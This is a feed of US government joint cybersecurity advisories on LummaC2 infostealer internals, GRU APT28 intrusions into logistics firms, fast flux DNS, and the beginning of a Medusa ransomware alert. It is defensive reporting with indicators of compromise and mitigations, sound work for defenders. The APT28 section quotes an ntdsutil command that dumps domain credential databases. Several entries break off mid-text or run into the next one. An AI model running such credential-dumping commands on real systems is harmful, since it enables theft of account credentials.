CB Alerts

Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organizations

Tue, 20 May 2025 19:20:23 +0000

Summary

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint advisory to disseminate known tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with threat actors deploying the LummaC2 information stealer (infostealer) malware. LummaC2 malware is able to infiltrate victim computer networks and exfiltrate sensitive information, threatening vulnerable individuals’ and organizations’ computer networks across multiple U.S. critical infrastructure sectors. According to FBI information and trusted third-party reporting, this activity has been observed as recently as May 2025. The IOCs included in this advisory were associated with LummaC2 malware infections from November 2023 through May 2025.

The FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of LummaC2 malware.

Download the PDF version of this report:

AA25-141B Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organizations (PDF, 1.28 MB )

For a downloadable copy of IOCs, see:

AA25-141B STIX XML (XML, 146.54 KB )

AA25-141B STIX JSON (JSON, 300.90 KB )

Technical Details

Note: This advisory uses the MITRE ATT&CK^® Matrix for Enterprise framework, version 17. See the MITRE ATT&CK Tactics and Techniques section of this advisory for threat actor activity mapped to MITRE ATT&CK tactics and techniques.

Overview

LummaC2 malware first appeared for sale on multiple Russian-language speaking cybercriminal forums in 2022. Threat actors frequently use spearphishing hyperlinks and attachments to deploy LummaC2 malware payloads [T1566.001, T1566.002]. Additionally, threat actors rely on unsuspecting users to execute the payload by clicking a fake Completely Automated Public Turing Test to tell Computers and Humans Apart (CAPTCHA). The CAPTCHA contains instructions for users to then open the Windows Run window (Windows Button + R) and paste clipboard contents (“CTRL + V”). After users press “enter” a subsequent Base64-encoded PowerShell process is executed.

To obfuscate their operations, threat actors have embedded and distributed LummaC2 malware within spoofed or fake popular software (i.e., multimedia player or utility software) [T1036]. The malware’s obfuscation methods allow LummaC2 actors to bypass standard cybersecurity measures, such as Endpoint Detection and Response (EDR) solutions or antivirus programs, designed to flag common phishing attempts or drive-by downloads [T1027].

Once a victim’s computer system is infected, the malware can exfiltrate sensitive user information, including personally identifiable information, financial credentials, cryptocurrency wallets, browser extensions, and multifactor authentication (MFA) details without immediate detection [TA0010, T1119]. Private sector statistics indicate there were more than 21,000 market listings selling LummaC2 logs on multiple cybercriminal forums from April through June of 2024, a 71.7 percent increase from April through June of 2023.

File Execution

Upon execution, the LummaC2.exe file will enter its main routine, which includes four sub-routines (see Figure 1).

Figure 1. LummaC2 Main Routine

The first routine decrypts strings for a message box that is displayed to the user (see Figure 2).

Figure 2. Message Box

If the user selects No, the malware will exit. If the user selects Yes, the malware will move on to its next routine, which decrypts its callback Command and Control (C2) domains [T1140]. A list of observed domains is included in the Indicators of Compromise section.

After each domain is decoded, the implant will attempt a POST request [T1071.001] (see Figure 3).

Figure 3. Post Request

If the POST request is successful, a pointer to the decoded domain string is saved in a global variable for later use in the main C2 routine used to retrieve JSON formatted commands (see Figure 4).

Figure 4. Code Saving Successful Callback Request

Once a valid C2 domain is contacted and saved, the malware moves on to the next routine, which queries the user’s name and computer name utilizing the Application Programming Interfaces (APIs) GetUserNameW and GetComputerNameW respectively [T1012]. The returned data is then hashed and compared against a hard-coded hash value (see Figure 5).

Figure 5. User and Computer Name Check

The hashing routine was not identified as a standard algorithm; however, it is a simple routine that converts a Unicode string to a 32-bit hexadecimal value.

If the username hash is equal to the value 0x56CF7626, then the computer name is queried. If the computer name queried is seven characters long, then the name is hashed and checked against the hard-coded value of 0xB09406C7. If both values match, a final subroutine will be called with a static value of the computer name hash as an argument. If this routine is reached, the process will terminate. This is most likely a failsafe to prevent the malware from running on the attacker’s system, as its algorithms are one-way only and will not reveal information on the details of the attacker’s own hostname and username.

If the username and hostname check function returns zero (does not match the hard-coded values), the malware will enter its main callback routine. The LummaC2 malware will contact the saved hostname from the previous check and send the following POST request (see Figure 6).

Figure 6. Second POST Request

The data returned from the C2 server is encrypted. Once decoded, the C2 data is in a JSON format and is parsed by the LummaC2 malware. The C2 uses the JSON configuration to parse its browser extensions and target lists using the ex key, which contains an array of objects (see Figure 7).

Figure 7. Parsing of ex JSON Value

Parsing the c key contains an array of objects, which will give the implant its C2 (see Figure 8).

Figure 8. Parsing of c JSON Value

C2 Instructions

Each array object that contains the JSON key value of t will be evaluated as a command opcode, resulting in the C2 instructions in the subsections below.

1. Opcode `0` – Steal Data Generic

This command allows five fields to be defined when stealing data, offering the most flexibility. The Opcode O command option allows LummaC2 affiliates to add their custom information gathering details (see Table 1).

*Table 2. Opcode* `1` *Options*
Key	Value
p	Path to steal from
m	File extensions to read
z	Output directory to store stolen data
d	Depth of recursiveness
fs	Maximum file size

2. Opcode `1` – Steal Browser Data

This command only allows for two options: a path and the name of the output directory. This command, based on sample configuration downloads, is used for browser data theft for everything except Mozilla [T1217] (see Table 2).

*Table 2. Opcode* `1` *Options*
Key	Value
p	Path to steal from
z	Name of Browser – Output

3. Opcode `2` – Steal Browser Data (Mozilla)

This command is identical to Opcode 1; however, this option seems to be utilized solely for Mozilla browser data (see Table 3).

*Table 3. Opcode* `2` *Options*
Key	Value
p	Path to steal from
z	Name of Browser – Output

4. Opcode `3` – Download a File

This command contains three options: a URL, file extension, and execution type. The configuration can specify a remote file with u to download and create the extension specified in the ft key [T1105] (see Table 4).

*Table 4. Opcode* `3` *Options*
Key	Value
u	URL for Download
ft	File Extension
e	Execution Type

The e value can take two values: 0 or 1. This specifies how to execute the downloaded file either with the LoadLibrary API or via the command line with rundll32.exe [T1106] (see Table 5).

*Table 5. Execution Types*
Key	Value
e=0	Execute with `LoadLibraryW()`
e=1	Executive with `rund1132.exe`

5. Take Screenshot

If the configuration JSON file has a key of “se” and its value is “true,” the malware will take a screenshot in BMP format and upload it to the C2 server.

6. Delete Self

If the configuration JSON file has a key of “ad” and its value is “true,” the malware will enter a routine to delete itself.

The command shown in Figure 9 will be decoded and executed for self-deletion.

Figure 9. Self-Deletion Command Line

Figure 10 depicts the above command line during execution.

Figure 10. Decoded Command Line in Memory

Host Modifications

Without any C2 interactions, the LummaC2 malware does not create any files on the infected drive. It simply runs in memory, gathers system information, and exfiltrates it to the C2 server [T1082]. The commands returned from the C2 server could indicate that it drops additional files and/or saves data to files on the local hard drive. This is variable, as these commands come from the C2 server and are mutable.

Decrypted Strings

Below is a list of hard-coded decrypted strings located in the binary (see Figure 11).

Figure 11. Decoded Strings

Indicators of Compromise

See Table 6 and Table 7 for LummaC2 IOCs obtained by the FBI and trusted third parties.

Disclaimer: The authoring agencies recommend organizations investigate and vet these indicators of compromise prior to taking action, such as blocking.

*Table 6. LummaC2 Executable Hashes*
Executables	Type
4AFDC05708B8B39C82E60ABE3ACE55DB (`LummaC2.exe` from November 2023)	MD5
E05DF8EE759E2C955ACC8D8A47A08F42 (`LummaC2.exe` from November 2023)	MD5
C7610AE28655D6C1BCE88B5D09624FEF	MD5
1239288A5876C09D9F0A67BCFD645735168A7C80 (`LummaC2.exe` from November 2023)	SHA1
B66DA4280C6D72ADCC68330F6BD793DF56A853CB (`LummaC2.exe` from November 2023)	SHA1
3B267FA5E1D1B18411C22E97B367258986E871E5	TLSH
19CC41A0A056E503CC2137E19E952814FBDF14F8D83F799AEA9B96ABFF11EFBB (November 2023)	SHA256
2F31D00FEEFE181F2D8B69033B382462FF19C35367753E6906ED80F815A7924F (`LummaC2.exe` from November 2023)	SHA256
4D74F8E12FF69318BE5EB383B4E56178817E84E83D3607213160276A7328AB5D	SHA256
325daeb781f3416a383343820064c8e98f2e31753cd71d76a886fe0dbb4fe59a	SHA256
76e4962b8ccd2e6fd6972d9c3264ccb6738ddb16066588dfcb223222aaa88f3c	SHA256
7a35008a1a1ae3d093703c3a34a21993409af42eb61161aad1b6ae4afa8bbb70	SHA256
a9e9d7770ff948bb65c0db24431f75dd934a803181afa22b6b014fac9a162dab	SHA256
b287c0bc239b434b90eef01bcbd00ff48192b7cbeb540e568b8cdcdc26f90959	SHA256
ca47c8710c4ffb4908a42bd986b14cddcca39e30bb0b11ed5ca16fe8922a468b	SHA256

*Table 7. LummaC2 DLL Binaries*
DLL Binaries	Type
iphlpapi.dll	IP Helper API
winhttp.dll	Windows HTTP Services

The following are domains observed deploying LummaC2 malware.

Disclaimer: The domains below are historical in nature and may not currently be malicious.

Pinkipinevazzey[.]pw
Fragnantbui[.]shop
Medicin

Russian GRU Targeting Western Logistics Entities and Technology Companies

Mon, 12 May 2025 16:49:12 +0000

Executive Summary

This joint cybersecurity advisory (CSA) highlights a Russian state-sponsored cyber campaign targeting Western logistics entities and technology companies. This includes those involved in the coordination, transport, and delivery of foreign assistance to Ukraine. Since 2022, Western logistics entities and IT companies have faced an elevated risk of targeting by the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (85th GTsSS), military unit 26165—tracked in the cybersecurity community under several names (see “Cybersecurity Industry Tracking”). The actors’ cyber espionage-oriented campaign, targeting technology companies and logistics entities, uses a mix of previously disclosed tactics, techniques, and procedures (TTPs). The authoring agencies expect similar targeting and TTP use to continue.

Executives and network defenders at logistics entities and technology companies should recognize the elevated threat of unit 26165 targeting, increase monitoring and threat hunting for known TTPs and indicators of compromise (IOCs), and posture network defenses with a presumption of targeting.

This cyber espionage-oriented campaign targeting logistics entities and technology companies uses a mix of previously disclosed TTPs and is likely connected to these actors’ wide scale targeting of IP cameras in Ukraine and bordering NATO nations.

The following authors and co-sealers are releasing this CSA:

United States National Security Agency (NSA)
United States Federal Bureau of Investigation (FBI)
United Kingdom National Cyber Security Centre (NCSC-UK)
Germany Federal Intelligence Service (BND) Bundesnachrichtendienst
Germany Federal Office for Information Security (BSI) Bundesamt für Sicherheit in der Informationstechnik
Germany Federal Office for the Protection of the Constitution (BfV) Bundesamt für Verfassungsschutz
Czech Republic Military Intelligence (VZ) Vojenské zpravodajství
Czech Republic National Cyber and Information Security Agency (NÚKIB) Národní úřad pro kybernetickou a informační bezpečnost
Czech Republic Security Information Service (BIS) Bezpečnostní informační služba
Poland Internal Security Agency (ABW) Agencja Bezpieczeństwa Wewnętrznego
Poland Military Counterintelligence Service (SKW) Służba Kontrwywiadu Wojskowego
United States Cybersecurity and Infrastructure Security Agency (CISA)
United States Department of Defense Cyber Crime Center (DC3)
United States Cyber Command (USCYBERCOM)
Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)
Canadian Centre for Cyber Security (CCCS)
Danish Defence Intelligence Service (DDIS) Forsvarets Efterretningstjeneste
Estonian Foreign Intelligence Service (EFIS) Välisluureamet
Estonian National Cyber Security Centre (NCSC-EE) Küberturvalisuse keskus
French Cybersecurity Agency (ANSSI) Agence nationale de la sécurité des systèmes d'information
Netherlands Defence Intelligence and Security Service (MIVD) Militaire Inlichtingen- en Veiligheidsdienst

Download the PDF version of this report:

Russian GRU Targeting Western Logistics Entities and Technology Companies (PDF, 1,081KB)

For a downloadable list of IOCs, visit:

AA25-141A STIX XML (XML, 117.02 KB )

AA25-141A STIX JSON (JSON, 144.29 KB )

Introduction

For over two years, the Russian GRU 85th GTsSS, military unit 26165—commonly known in the cybersecurity community as APT28, Fancy Bear, Forest Blizzard, BlueDelta, and a variety of other identifiers—has conducted this campaign using a mix of known tactics, techniques, and procedures (TTPs), including reconstituted password spraying capabilities, spearphishing, and modification of Microsoft Exchange mailbox permissions.
In late February 2022, multiple Russian state-sponsored cyber actors increased the variety of cyber operations for purposes of espionage, destruction, and influence—with unit 26165 predominately involved in espionage. [1] As Russian military forces failed to meet their military objectives and Western countries provided aid to support Ukraine’s territorial defense, unit 26165 expanded its targeting of logistics entities and technology companies involved in the delivery of aid. These actors have also targeted Internet-connected cameras at Ukrainian border crossings to monitor and track aid shipments.
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 17. See Appendix A: MITRE ATT&CK tactics and techniques for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. This advisory uses the MITRE D3FEND® framework, version 1.0.

Description of Targets

The GRU unit 26165 cyber campaign against Western logistics providers and technology companies has targeted dozens of entities, including government organizations and private/commercial entities across virtually all transportation modes: air, sea, and rail. These actors have targeted entities associated with the following verticals within NATO member states, Ukraine, and at international organizations:

Defense Industry
Transportation and Transportation Hubs (ports, airports, etc.)
Maritime
Air Traffic Management
IT Services

In the course of the targeting lifecycle, unit 26165 actors identified and conducted follow-on targeting of additional entities in the transportation sector that had business ties to the primary target, exploiting trust relationships to attempt to gain additional access [T1199].

The actors also conducted reconnaissance on at least one entity involved in the production of industrial control system (ICS) components for railway management, though a successful compromise was not confirmed [TA0043].

The countries with targeted entities include the following, as illustrated in Figure 1:

Bulgaria
Czech Republic
France
Germany
Greece
Italy
Moldova
Netherlands
Poland
Romania
Slovakia
Ukraine
United States

Figure 1: Countries with Targeted Entities

Initial Access TTPs

To gain initial access to targeted entities, unit 26165 actors used several techniques to gain initial access to targeted entities, including (but not limited to):

Credential guessing [T1110.001] / brute force [T1110.003]
Spearphishing for credentials [T1566]
Spearphishing delivering malware [T1566]
Outlook NTLM vulnerability (CVE-2023-23397)
Roundcube vulnerabilities (CVE-2020-12641, CVE-2020-35730, CVE-2021-44026)
Exploitation of Internet-facing infrastructure, including corporate VPNs [T1133], via public vulnerabilities and SQL injection [T1190]
Exploitation of WinRAR vulnerability (CVE-2023-38831)

The actors abused vulnerabilities associated with a range of brands and models of small office/home office (SOHO) devices to facilitate covert cyber operations, as well as proxy malicious activity via devices with geolocation in proximity to the target [T1665]. [2]

Credential Guessing/Brute Force

Unit 26165 actors’ credential guessing [T1110.001] operations in this campaign exhibit some similar characteristics to those disclosed in the previous CSA “Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments.” [3] Based on victim network investigations, the current iteration of this TTP employs a similar blend of anonymization infrastructure, including the use of Tor and commercial VPNs [T1090.003]. The actors frequently rotated the IP addresses used to further hamper detection. All observed connections were made via encrypted TLS [T1573].

Spearphishing

GRU unit 26165 actors’ spearphishing emails included links [T1566.002] leading to fake login pages impersonating a variety of government entities and Western cloud email providers’ webpages. These webpages were typically hosted on free third-party services or compromised SOHO devices and often used legitimate documents associated with thematically similar entities as lures. The subjects of spearphishing emails were diverse and ranged from professional topics to adult themes. Phishing emails were frequently sent via compromised accounts or free webmail accounts [T1586.002, T1586.003]. The emails were typically written in the target’s native language and sent to a single targeted recipient.

Some campaigns employed multi-stage redirectors [T1104] verifying IP-geolocation [T1627.001] and browser fingerprints [T1627] to protect credential harvesting infrastructure or provide multifactor authentication (MFA) [T1111] and CAPTCHA relaying capabilities [T1056]. Connecting endpoints failing the location checks were redirected to a benign URL [T1627], such as msn.com. Redirector services used include:

Webhook[.]site
FrgeIO
InfinityFree
Dynu
Mocky
Pipedream
Mockbin[.]org

The actors also used spearphishing to deliver malware (including HEADLACE and MASEPIE) executables [T1204.002] delivered via third-party services and redirectors [T1566.002], scripts in a mix of languages [T1059] (including BAT [T1059.003] and VBScript [T1059.005]) and links to hosted shortcuts [T1204.001].

CVE Usage

Throughout this campaign, GRU unit 26165 weaponized an Outlook NTLM vulnerability (CVE-2023-23397) to collect NTLM hashes and credentials via specially crafted Outlook calendar appointment invitations [T1187]. [4],[5] These actors also used a series of Roundcube CVEs (CVE-2020-12641, CVE-2020-35730, and CVE-2021-44026) to execute arbitrary shell commands [T1059], gain access to victim email accounts, and retrieve sensitive data from email servers [T1114].

Since at least fall 2023, the actors leveraged a WinRAR vulnerability (CVE-2023-38831) allowing for the execution of arbitrary code embedded in an archive as a means of initial access [T1659]. The actors sent emails with malicious attachments [T1566.001] or embedded hyperlinks [T1566.002] that downloaded a malicious archive prepared using this CVE.

Post-Compromise TTPs

After an initial compromise using one of the above techniques, unit 26165 actors conducted contact information reconnaissance to identify additional targets in key positions [T1589.002]. The actors also conducted reconnaissance of the cybersecurity department [T1591], individuals responsible for coordinating transport [T1591.004], and other companies cooperating with the victim entity [T1591.002].

The actors used native commands and open source tools, such as Impacket and PsExec, to move laterally within the environment [TA0008]. Multiple Impacket scripts were used as .exe files, in addition to the python versions, depending on the victim environment. The actors also moved laterally within the network using Remote Desktop Protocol (RDP) [T1021.001] to access additional hosts and attempt to dump Active Directory NTDS.dit domain databases [T1003.003] using native Active Directory Domain Services commands, such as in Figure 2: Example Active Directory Domain Services command:

C:\Windows\system32\ntdsutil.exe "activate instance ntds" ifm "create full C:\temp\[a-z]{3}" quit quit

Figure 2: Example Active Directory Domain Services command

Additionally, GRU unit 26165 actors used the tools Certipy and ADExplorer.exe to exfiltrate information from the Active Directory. The actors installed python [T1059.006] on infected machines to enable the execution of Certipy. Accessed files were archived in .zip files prior to exfiltration [T1560]. The actors attempted to exfiltrate archived data via a previously dropped OpenSSH binary [T1048].

Incident response investigations revealed that the actors would take steps to locate and exfiltrate lists of Office 365 users and set up sustained email collection. The actors used manipulation of mailbox permissions [T1098.002] to establish sustained email collection at compromised logistics entities, as detailed in a Polish Cybercommand blog. [6]

After initial authentication, unit 26165 actors would change accounts' folder permissions and enroll compromised accounts in MFA mechanisms to increase the trust-level of compromised accounts and enable sustained access [T1556.006]. The actors leveraged python scripts to retrieve plaintext passwords via Group Policy Preferences [T1552.006] using Get-GPPPassword.py and a modified ldap-dump.py to enumerate the Windows environment [T1087.002] and conduct a brute force password spray [T1110.003] via Lightweight Directory Access Protocol (LDAP). The actors would additionally delete event logs through the wevtutil utility [T1070.001].

After gaining init

Fast Flux: A National Security Threat

Tue, 01 Apr 2025 19:00:21 +0000

Executive summary

Many networks have a gap in their defenses for detecting and blocking a malicious technique known as “fast flux.” This technique poses a significant threat to national security, enabling malicious cyber actors to consistently evade detection. Malicious cyber actors, including cybercriminals and nation-state actors, use fast flux to obfuscate the locations of malicious servers by rapidly changing Domain Name System (DNS) records. Additionally, they can create resilient, highly available command and control (C2) infrastructure, concealing their subsequent malicious operations. This resilient and fast changing infrastructure makes tracking and blocking malicious activities that use fast flux more difficult.

The National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), Canadian Centre for Cyber Security (CCCS), and New Zealand National Cyber Security Centre (NCSC-NZ) are releasing this joint cybersecurity advisory (CSA) to warn organizations, Internet service providers (ISPs), and cybersecurity service providers of the ongoing threat of fast flux enabled malicious activities as a defensive gap in many networks. This advisory is meant to encourage service providers, especially Protective DNS (PDNS) providers, to help mitigate this threat by taking proactive steps to develop accurate, reliable, and timely fast flux detection analytics and blocking capabilities for their customers. This CSA also provides guidance on detecting and mitigating elements of malicious fast flux by adopting a multi-layered approach that combines DNS analysis, network monitoring, and threat intelligence.

The authoring agencies recommend all stakeholders—government and providers—collaborate to develop and implement scalable solutions to close this ongoing gap in network defenses against malicious fast flux activity.

Download the PDF version of this report: Fast Flux: A National Security Threat (PDF, 841 KB).

Technical details

When malicious cyber actors compromise devices and networks, the malware they use needs to “call home” to send status updates and receive further instructions. To decrease the risk of detection by network defenders, malicious cyber actors use dynamic resolution techniques, such as fast flux, so their communications are less likely to be detected as malicious and blocked.

Fast flux refers to a domain-based technique that is characterized by rapidly changing the DNS records (e.g., IP addresses) associated with a single domain [T1568.001].

Single and double flux

Malicious cyber actors use two common variants of fast flux to perform operations:

1. Single flux: A single domain name is linked to numerous IP addresses, which are frequently rotated in DNS responses. This setup ensures that if one IP address is blocked or taken down, the domain remains accessible through the other IP addresses. See Figure 1 as an example to illustrate this technique.

Figure 1: Single flux technique.

Note: This behavior can also be used for legitimate purposes for performance reasons in dynamic hosting environments, such as in content delivery networks and load balancers.

2. Double flux: In addition to rapidly changing the IP addresses as in single flux, the DNS name servers responsible for resolving the domain also change frequently. This provides an additional layer of redundancy and anonymity for malicious domains. Double flux techniques have been observed using both Name Server (NS) and Canonical Name (CNAME) DNS records. See Figure 2 as an example to illustrate this technique.

Figure 2: Double flux technique.

Both techniques leverage a large number of compromised hosts, usually as a botnet from across the Internet that acts as proxies or relay points, making it difficult for network defenders to identify the malicious traffic and block or perform legal enforcement takedowns of the malicious infrastructure. Numerous malicious cyber actors have been reported using the fast flux technique to hide C2 channels and remain operational. Examples include:

Bulletproof hosting (BPH) services offer Internet hosting that disregards or evades law enforcement requests and abuse notices. These providers host malicious content and activities while providing anonymity for malicious cyber actors. Some BPH companies also provide fast flux services, which help malicious cyber actors maintain connectivity and improve the reliability of their malicious infrastructure. [1]
- Refer to ASD’s ACSC’s “Bulletproof” hosting providers: Cracks in the armour of cybercriminal infrastructure for more information on BPH providers. [2]
Fast flux has been used in Hive and Nefilim ransomware attacks. [3], [4]
Gamaredon uses fast flux to limit the effectiveness of IP blocking. [5], [6], [7]

The key advantages of fast flux networks for malicious cyber actors include:

Increased resilience. As a fast flux network rapidly rotates through botnet devices, it is difficult for law enforcement or abuse notifications to process the changes quickly and disrupt their services.
Render IP blocking ineffective. The rapid turnover of IP addresses renders IP blocking irrelevant since each IP address is no longer in use by the time it is blocked. This allows criminals to maintain resilient operations.
Anonymity. Investigators face challenges in tracing malicious content back to the source through fast flux networks. This is because malicious cyber actors’ C2 botnets are constantly changing the associated IP addresses throughout the investigation.

Additional malicious uses

Fast flux is not only used for maintaining C2 communications, it also can play a significant role in phishing campaigns to make social engineering websites harder to block or take down. Phishing is often the first step in a larger and more complex cyber compromise. Phishing is typically used to trick victims into revealing sensitive information (such as login passwords, credit card numbers, and personal data), but can also be used to distribute malware or exploit system vulnerabilities. Similarly, fast flux is used for maintaining high availability for cybercriminal forums and marketplaces, making them resilient against law enforcement takedown efforts.

Some BPH providers promote fast flux as a service differentiator that increases the effectiveness of their clients’ malicious activities. For example, one BPH provider posted on a dark web forum that it protects clients from being added to Spamhaus blocklists by easily enabling the fast flux capability through the service management panel (See Figure 3). A customer just needs to add a "dummy server interface," which redirects incoming queries to the host server automatically. By doing so, only the dummy server interfaces are reported for abuse and added to the Spamhaus blocklist, while the servers of the BPH customers remain "clean" and unblocked.

Figure 3: Example dark web fast flux advertisement.

The BPH provider further explained that numerous malicious activities beyond C2, including botnet managers, fake shops, credential stealers, viruses, spam mailers, and others, could use fast flux to avoid identification and blocking.

As another example, a BPH provider that offers fast flux as a service advertised that it automatically updates name servers to prevent the blocking of customer domains. Additionally, this provider further promoted its use of separate pools of IP addresses for each customer, offering globally dispersed domain registrations for increased reliability.

Detection techniques

The authoring agencies recommend that ISPs and cybersecurity service providers, especially PDNS providers, implement a multi-layered approach, in coordination with customers, using the following techniques to aid in detecting fast flux activity [CISA CPG 3.A]. However, quickly detecting malicious fast flux activity and differentiating it from legitimate activity remains an ongoing challenge to developing accurate, reliable, and timely fast flux detection analytics.

1. Leverage threat intelligence feeds and reputation services to identify known fast flux domains and associated IP addresses, such as in boundary firewalls, DNS resolvers, and/or SIEM solutions.

2. Implement anomaly detection systems for DNS query logs to identify domains exhibiting high entropy or IP diversity in DNS responses and frequent IP address rotations. Fast flux domains will frequently cycle though tens or hundreds of IP addresses per day.

3. Analyze the time-to-live (TTL) values in DNS records. Fast flux domains often have unusually low TTL values. A typical fast flux domain may change its IP address every 3 to 5 minutes.

4. Review DNS resolution for inconsistent geolocation. Malicious domains associated with fast flux typically generate high volumes of traffic with inconsistent IP-geolocation information.

5. Use flow data to identify large-scale communications with numerous different IP addresses over short periods.

6. Develop fast flux detection algorithms to identify anomalous traffic patterns that deviate from usual network DNS behavior.

7. Monitor for signs of phishing activities, such as suspicious emails, websites, or links, and correlate these with fast flux activity. Fast flux may be used to rapidly spread phishing campaigns and to keep phishing websites online despite blocking attempts.

8. Implement customer transparency and share information about detected fast flux activity, ensuring to alert customers promptly after confirmed presence of malicious activity.

Mitigations

All organizations

To defend against fast flux, government and critical infrastructure organizations should coordinate with their Internet service providers, cybersecurity service providers, and/or their Protective DNS services to implement the following mitigations utilizing accurate, reliable, and timely fast flux detection analytics.

Note: Some legitimate activity, such as common content delivery network (CDN) behaviors, may look like malicious fast flux activity. Protective DNS services, service providers, and network defenders should make reasonable efforts, such as allowlisting expected CDN services, to avoid blocking or impeding legitimate content.

1. DNS and IP blocking and sinkholing of malicious fast flux domains and IP addresses

Block access to domains identified as using fast flux through non-routable DNS responses or firewall rules.
Consider sinkholing the malicious domains, redirecting traffic from those domains to a controlled server to capture and analyze the traffic, helping to identify compromised hosts within the network.
Block IP addresses known to be associated with malicious fast flux networks.

2. Reputational filtering of fast flux enabled malicious activity

Block traffic to and from domains or IP addresses with poor reputations, especially ones identified as participating in malicious fast flux activity.

3. Enhanced monitoring and logging

Increase logging and monitoring of DNS traffic and network communications to identify new or ongoing fast flux activities.
Implement automated alerting mechanisms to respond swiftly to detected fast flux patterns.
Refer to ASD’s ACSC joint publication, Best practices for event logging and threat detection, for further logging recommendations.

4. Collaborative defense and information sharing

Share detected fast flux indicators (e.g., domains, IP addresses) with trusted partners and threat intelligence communities to enhance collective defense efforts. Examples of indicator sharing initiatives include CISA’s Automated Indicator Sharing or sector-based Information Sharing and Analysis Centers (ISACs) and ASD’s Cyber Threat Intelligence Sharing Platform (CTIS) in Australia.
Participate in public and private information-sharing programs to stay informed about emerging fast flux tactics, techniques, and procedures (TTPs). Regular collaboration is particularly important because most malicious activity by these domains occurs within just a few days of their initial use; therefore, early discovery and information sharing by the cybersecurity community is crucial to minimizing such malicious activity. [8]

5. Phishing awareness and training

Implement employee awareness and training programs to help personnel identify and respond appropriately to phishing attempts.
Develop policies and procedures to manage and contain phishing incidents, particularly those facilitated by fast flux networks.
For more information on mitigating phishing, see joint Phishing Guidance: Stopping the Attack Cycle at Phase One.

Network defenders

The authoring agencies encourage organizations to use cybersecurity and PDNS services that detect and block fast flux. By leveraging providers that detect fast flux and implement capabilities for DNS and IP blocking, sinkholing, reputational filtering, enhanced monitoring, logging, and collaborative defense of malicious fast flux domains and IP addresses, organizations can mitigate many risks associated with fast flux and maintain a more secure environment.

However, some PDNS providers may not detect and block malicious fast flux activities. Organizations should not assume that their PDNS providers block malicious fast flux activity automatically and should contact their PDNS providers to validate coverage of this specific cyber threat.

For more information on PDNS services, see the 2021 joint cybersecurity information sheet from NSA and CISA about Selecting a Protective DNS Service. [9] In addition, NSA offers no-cost cybersecurity services to Defense Industrial Base (DIB) companies, including a PDNS service. For more information, see NSA’s DIB Cybersecurity Services and factsheet. CISA also offers a Protective DNS service for federal civilian executive branch (FCEB) agencies. See CISA’s Protective Domain Name System Resolver page and factsheet for more information.

Conclusion

Fast flux represents a persistent threat to network security, leveraging rapidly changing infrastructure to obfuscate malicious activity. By implementing robust detection and mitigation strategies, organizations can significantly reduce their risk of compromise by fast flux-enabled threats.

The authoring agencies strongly recommend organizations engage their cybersecurity providers on developing a multi-layered approach to detect and mitigate malicious fast flux operations. Utilizing services that detect and block fast flux enabled malicious cyber activity can significantly bolster an organization's cyber defenses.

Works cited

[1] Intel471. Bulletproof Hosting: A Critical Cybercriminal Service. 2024. https://intel471.com/blog/bulletproof-hosting-a-critical-cybercriminal-service

[2] Australian Signals Directorate’s Australian Cyber Security Centre. "Bulletproof" hosting providers: Cracks in the armour of cybercriminal infrastructure. 2025. https://www.cyber.gov.au/about-us/view-all-content/publications/bulletproof-hosting-providers

[3] Logpoint. A Comprehensive guide to Detect Ransomware. 2023. https://www.logpoint.com/wp-content/uploads/2023/04/logpoint-a-comprehensive-guide-to-detect-ransomware.pdf

[4] Trendmicro. Modern Ransomware’s Double Extortion Tactic’s and How to Protect Enterprises Against Them. 2021. https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/modern-ransomwares-double-extortion-tactics-and-how-to-protect-enterprises-against-them

[5] Unit 42. Russia’s Trident Ursa (aka Gamaredon APT) Cyber Conflict Operations Unwavering Since Invasion of Ukraine. 2022. https://unit42.paloaltonetworks.com/trident-ursa/

[6] Recorded Future. BlueAlpha Abuses Cloudflare Tunneling Service for GammaDrop Staging Infrastructure. 2024. stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint advisory to disseminate known Medusa ransomware TTPs and IOCs, identified through FBI investigations as recently as February 2025.

Medusa is a ransomware-as-a-service (RaaS) variant first identified in June 2021. As of February 2025, Medusa developers and affiliates have impacted over 300 victims from a variety of critical infrastructure sectors with affected industries including medical, education, legal, insurance, technology, and manufacturing. The Medusa ransomware variant is unrelated to the MedusaLocker variant and the Medusa mobile malware variant per the FBI’s investigation.

FBI, CISA, and MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of Medusa ransomware incidents.

Download the PDF version of this report:

For a downloadable list of IOCs, see:

AA25-071A STIX XML (XML, 34.30 KB ) AA25-071A STIX JSON (JSON, 42.28 KB )

Technical Details

Note: This advisory uses the MITRE ATT&CK^® Matrix for Enterprise framework, version 16. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.

Background

The RaaS Medusa variant has been used to conduct ransomware attacks from 2021 to present. Medusa originally operated as a closed ransomware variant, meaning all development and associated operations were controlled by the same group of cyber threat actors. While Medusa has since progressed to using an affiliate model, important operations such as ransom negotiation are still centrally controlled by the developers. Both Medusa developers and affiliates—referred to as “Medusa actors” in this advisory—employ a double extortion model, where they encrypt victim data and threaten to publicly release exfiltrated data if a ransom is not paid.

Initial Access

Medusa developers typically recruit initial access brokers (IABs) in cybercriminal forums and marketplaces to obtain initial access [TA0001] to potential victims. Potential payments between $100 USD and $1 million USD are offered to these affiliates with the opportunity to work exclusively for Medusa. Medusa IABs (affiliates) are known to make use of common techniques, such as:

Phishing campaigns as a primary method for stealing victim credentials [T1566].
